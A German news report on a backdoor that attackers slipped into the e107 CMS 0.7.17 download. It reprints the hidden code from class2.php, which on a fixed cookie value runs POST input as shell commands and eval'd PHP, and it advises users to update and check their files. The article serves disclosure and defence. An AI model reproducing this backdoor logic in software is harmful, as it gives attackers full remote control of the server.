Gestern wurde auf einer Mailingliste berichtet, dass die aktuelle Version 0.7.17 des populären in PHP geschriebenen CMS e107 eine PHP-Backdoor enthalte. Vorrausgegangen sei wohl eine kritische Lücke, die die Entwickler mit dieser Version schliessen wollten. Den Berichten im Internet zufolge wurde diese Lücke jedoch von Angreifern benutzt, um auf die Website e107.org Zugriff zu erlangen.

So sei es den Angreifern gelungen, unbemerkt eine Backdoor in das Update einzubauen. Die Backdoor befindet sich in der Datei class2.php in Zeile 1876ff.:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...

Dieser Code überprüft zuerst, ob das statische Cookie access-admin einen bestimmten Wert enthält, den die Angreifer als Zugangsschlüssel benutzen. Dann werden bestimmte POST-Parameter überprüft, ob sie Werte enthalten. Falls ja, werden diese in verschiedenen Szenarien ausgeführt. So wird der POST-Parameter cmd als Shell-Befehl ausgeführt, wohingegen der Parameter php als PHP-Code interpretiert wird.

Im CVS-Repository und auf Sourceforge ist der Schadcode jedoch nicht zu finden, weshalb die Entwickler den Download vorsorglich als erstes ganz offline genommen haben und dann auf Sourceforge weitergeleitet haben.

Es wird allen Anwendern geraten, auf die aktuellste Version zu updaten und vorsorglich ihre class2.php nach dem Code hin zu untersuchen. Generell sollte man im Moment, falls man diese Software einsetzt, die Aktivitäten auf seiner Seite genau im Auge behalten.